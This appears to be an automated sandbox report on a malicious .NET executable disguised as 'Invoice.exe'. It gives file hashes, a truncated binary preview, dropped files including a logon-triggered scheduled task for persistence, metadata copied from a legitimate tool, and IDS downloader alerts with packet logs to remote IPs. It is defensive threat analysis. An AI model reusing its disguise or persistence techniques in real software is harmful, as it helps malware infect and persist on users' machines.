SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jffu1ns0.mmu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrtartsn.a3g.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5eoxzsa.uqa.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ze4dnuld.iuf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zliqdhbw.qdu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpE22E.tmp

Download File

Process:	C:\Users\user\Desktop\Invoice.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.118542596731661
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtauxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTZv
MD5:	B2BF278503FBD5697E1B4ECEE73C7B80
SHA1:	962D0FEDA3D9B6C3428C36B0006EBC01B4467AD5
SHA-256:	F75F561C4571DA1061F9B62AE8CED0B8976D05E2075EF129B4DA7950F5DCB9AC
SHA-512:	6BA648C2C6E4A2A28278294AD3AE70043AB4952075D6A47B2B159605E2BFB8233BD03CDDC96BDCB980A76655287F16648467446B2C0C8E12DEAF98E01B05289E
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe

Download File

Process:	C:\Users\user\Desktop\Invoice.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1085952
Entropy (8bit):	7.086831153372267
Encrypted:	false
SSDEEP:	12288:w4TRok9TlSfVq5HI+S42YrWWiA3FTmwuVd0qF6BvUxG:wcmtgrbiWNm1Vd0q4Mx
MD5:	97FBC4C5452A0D478E708C3AD9E09536
SHA1:	D3B168446645934F915B1F7689D1187E93222D96
SHA-256:	F73D33967467D57D009640324C5C6036BB4E32127EC73CF44882A2EEE9D5C4E2
SHA-512:	531AB133975933C97B277530EC4DC48D6739E3590959189E792CDF1CB1C3B8D9A370C13B36A49A661C4C8FA833060FCC7B2B1A1FE15C47707BEF3168569CA351
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0..............(... ...@....@.. ...............................]....`..................................'..O....@..X...........................p...T............................................ ............... ..H............text........ ...................... ..`.rsrc...X....@......................@..@.reloc..............................@..B.................'......H.......................X...............................................0..2.......(&........('....o(.....(...+,....t....o...~+......0..2.......(&........('....o(.....(...+,....t....o,...~+......0..l........(-....(.....(....(....(....o/....{....(....o/....{....(....(....(....o/....{....(....o/....{....(....o/....(....s'...zz.,..{....,..{....o......(0...*..0...............('...s1.....s2...}.....s3...}.....s4...}.....s4...}.....s4...}.....s4...}.....s2...}.....{....o5...

C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.470232619341251
Encrypted:	false
SSDEEP:	6144:k+Xfpi67eLPU9skLmb0b4dWSPKaJG8nAgejZQqZaKWFIeC/F1cXkdW1qaEGl11:DXD94dWlLZQqYgtW0s11
MD5:	75B15E2A4ACC54CB3466F61A85EE9EB7
SHA1:	5435375D837A1453C7C936E9D7C904FF0CC421CA
SHA-256:	8B1713A17199130D61C7F99D46580F5E17CFB64A5EE7DA661653F8201DC2182A
SHA-512:	ECAB496647C65B8D881C827794B1E3D42BA10AD98B72E00E46250D3DF034DD9ED9F02DFD386B6B9AF567D8EA56AE4DC87CEB3797F294DA8303800914CF5133B5
Malicious:	false
Preview:	regf:...:....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7wK...............................................................................................................................................................................................................................................................................................................................................{@!C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.153240003731607
Encrypted:	false
SSDEEP:	768:Sc7DoFVINr0WFRyaiWgVf1LEl99Sd9l+9uPIEcfmsc7IJ+VPH:ScBFd3u1IlI9l0utci
MD5:	5F3C306CABF288C789ADE4B047D9FC0D
SHA1:	4F1CA81D4B6D9CDE8756C149A319C56A1905DA91
SHA-256:	E6CB26EC50D2B9507CA413CE4B4723DAB723C322EC926ED6C77FC5795DC62E84
SHA-512:	4F11E7F4F26CD8D830DED40219A7771F8552B07414613B9E1DF61965F1FE32EA06949DAD675D781B26FA00D4E28E35214809FAF28505B3FB0B1BE71588940099
Malicious:	false
Preview:	regf9...9....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7wK...............................................................................................................................................................................................................................................................................................................................................}@!CHvLE........9............/...<..^.~kt._7............................. .......0..hbin.................\.Z............nk,..\.Z........ ...........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........c...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.086831153372267
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Invoice.exe
File size:	1'085'952 bytes
MD5:	97fbc4c5452a0d478e708c3ad9e09536
SHA1:	d3b168446645934f915b1f7689d1187e93222d96
SHA256:	f73d33967467d57d009640324c5c6036bb4e32127ec73cf44882a2eee9d5c4e2
SHA512:	531ab133975933c97b277530ec4dc48d6739e3590959189e792cdf1cb1c3b8d9a370c13b36a49a661c4c8fa833060fcc7b2b1a1fe15c47707bef3168569ca351
SSDEEP:	12288:w4TRok9TlSfVq5HI+S42YrWWiA3FTmwuVd0qF6BvUxG:wcmtgrbiWNm1Vd0q4Mx
TLSH:	63350610BF5C6315E92D39FD6A66827726362E16A904F1EAE038720D9D31207CF3779E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0..............(... ...@....@.. ...............................]....`................................

File Icon


Icon Hash:	0d0f461329236365

Static PE Info

General

Entrypoint:	0x50280a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67CFC885 [Tue Mar 11 05:22:13 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1027b8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x104000	0x8258	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xff570	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x100810	0x100a00	b8d458bd4914ed5911c8172347daad08	False	0.607230653312226	data	7.106139641001328	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x104000	0x8258	0x8400	af710c05b906cfcae4929ddec5cc9aec	False	0.4659090909090909	data	5.451226976780169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10e000	0xc	0x200	16a27b6e3e90f0102fa1f1736a8ea8c6	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x104128	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.7411347517730497
RT_ICON	0x1045a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.5647279549718575
RT_ICON	0x105658	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.5240663900414938
RT_ICON	0x107c10	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.4404227680680208
RT_GROUP_ICON	0x10be48	0x3e	data	0.7903225806451613
RT_VERSION	0x10be98	0x3bc	data	0.44142259414225943

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments	InSim packet sniffer for the racing simulator Live for Speed
CompanyName
FileDescription	InSimSniffer
FileVersion	1.3.2.0
InternalName	AofI.exe
LegalCopyright	Copyright Alex McBride 2009 - 2012
LegalTrademarks
OriginalFilename	AofI.exe
ProductName	InSimSniffer
ProductVersion	1.3.2.0
Assembly Version	1.3.2.0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-11T09:59:33.058094+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49715	132.226.8.169	80	TCP
2025-03-11T09:59:36.542463+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49715	132.226.8.169	80	TCP
2025-03-11T09:59:38.653970+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49720	104.21.16.1	443	TCP
2025-03-11T09:59:39.734228+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49725	132.226.8.169	80	TCP
2025-03-11T09:59:42.730173+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	132.226.8.169	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 11, 2025 09:59:31.917746067 CET	49715	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:31.922744036 CET	80	49715	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:31.923397064 CET	49715	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:31.923639059 CET	49715	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:31.928469896 CET	80	49715	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:32.729234934 CET	80	49715	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:32.742024899 CET	49715	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:32.746912003 CET	80	49715	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:33.014009953 CET	80	49715	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:33.058094025 CET	49715	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:33.260977030 CET	49717	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:33.261013985 CET	443	49717	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:33.261168003 CET	49717	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:33.666256905 CET	49717	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:33.666311026 CET	443	49717	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:35.465672970 CET	443	49717	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:35.465759039 CET	49717	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:35.475683928 CET	49717	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:35.475718021 CET	443	49717	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:35.476032972 CET	443	49717	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:35.618657112 CET	49717	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:35.664336920 CET	443	49717	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:36.050553083 CET	443	49717	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:36.050620079 CET	443	49717	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:36.050714970 CET	49717	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:36.077950954 CET	49717	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:36.113143921 CET	49715	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:36.118040085 CET	80	49715	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:36.380815983 CET	80	49715	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:36.382848978 CET	49720	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:36.382890940 CET	443	49720	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:36.383078098 CET	49720	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:36.383445978 CET	49720	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:36.383459091 CET	443	49720	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:36.542463064 CET	49715	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:38.152245998 CET	443	49720	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:38.160871029 CET	49720	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:38.160896063 CET	443	49720	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:38.653984070 CET	443	49720	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:38.687968016 CET	443	49720	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:38.689534903 CET	49720	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:38.754947901 CET	49720	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:38.795507908 CET	49715	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:38.796684027 CET	49725	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:38.800734043 CET	80	49715	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:38.800808907 CET	49715	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:38.802215099 CET	80	49725	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:38.802287102 CET	49725	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:38.802426100 CET	49725	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:38.807373047 CET	80	49725	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:39.574865103 CET	80	49725	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:39.577295065 CET	49727	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:39.577341080 CET	443	49727	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:39.577409983 CET	49727	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:39.577979088 CET	49727	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:39.577997923 CET	443	49727	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:39.734227896 CET	49725	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:41.298060894 CET	443	49727	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:41.308629990 CET	49727	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:41.308660030 CET	443	49727	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:41.822299957 CET	443	49727	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:41.822396040 CET	443	49727	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:41.822448969 CET	49727	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:41.822860003 CET	49727	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:41.842757940 CET	49725	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:41.847824097 CET	80	49725	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:41.847903967 CET	49725	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:41.850779057 CET	49730	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:41.855631113 CET	80	49730	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:41.855761051 CET	49730	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:41.855869055 CET	49730	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:41.860672951 CET	80	49730	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:42.626250982 CET	80	49730	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:42.627757072 CET	49732	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:42.627819061 CET	443	49732	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:42.627897978 CET	49732	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:42.628200054 CET	49732	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:42.628221035 CET	443	49732	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:42.730173111 CET	49730	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:44.297004938 CET	443	49732	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:44.299441099 CET	49732	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:44.299525976 CET	443	49732	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:44.828541994 CET	443	49732	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:44.828609943 CET	443	49732	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:44.828672886 CET	49732	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:44.829184055 CET	49732	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:44.837147951 CET	49730	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:44.839226961 CET	49734	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:44.842108965 CET	80	49730	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:44.842170954 CET	49730	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:44.844078064 CET	80	49734	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:44.844161987 CET	49734	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:44.845052004 CET	49734	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:44.849885941 CET	80	49734	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:45.627016068 CET	80	49734	132.226.8.169	192.168.2.4
Mar 11, 2025 09:59:45.628644943 CET	49735	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:45.628690004 CET	443	49735	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:45.628808975 CET	49735	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:45.629079103 CET	49735	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:45.629091978 CET	443	49735	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:45.667480946 CET	49734	80	192.168.2.4	132.226.8.169
Mar 11, 2025 09:59:45.942996979 CET	63653	53	192.168.2.4	1.1.1.1
Mar 11, 2025 09:59:45.947824955 CET	53	63653	1.1.1.1	192.168.2.4
Mar 11, 2025 09:59:45.948293924 CET	63653	53	192.168.2.4	1.1.1.1
Mar 11, 2025 09:59:45.953188896 CET	53	63653	1.1.1.1	192.168.2.4
Mar 11, 2025 09:59:46.400614977 CET	63653	53	192.168.2.4	1.1.1.1
Mar 11, 2025 09:59:46.406337023 CET	53	63653	1.1.1.1	192.168.2.4
Mar 11, 2025 09:59:46.406485081 CET	63653	53	192.168.2.4	1.1.1.1
Mar 11, 2025 09:59:47.270817995 CET	443	49735	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:47.273184061 CET	49735	443	192.168.2.4	104.21.16.1
Mar 11, 2025 09:59:47.273211002 CET	443	49735	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:47.794764996 CET	443	49735	104.21.16.1	192.168.2.4
Mar 11, 2025 09:59:47.794871092 CET	443	49735	104.21.16.1	192.168.2.4
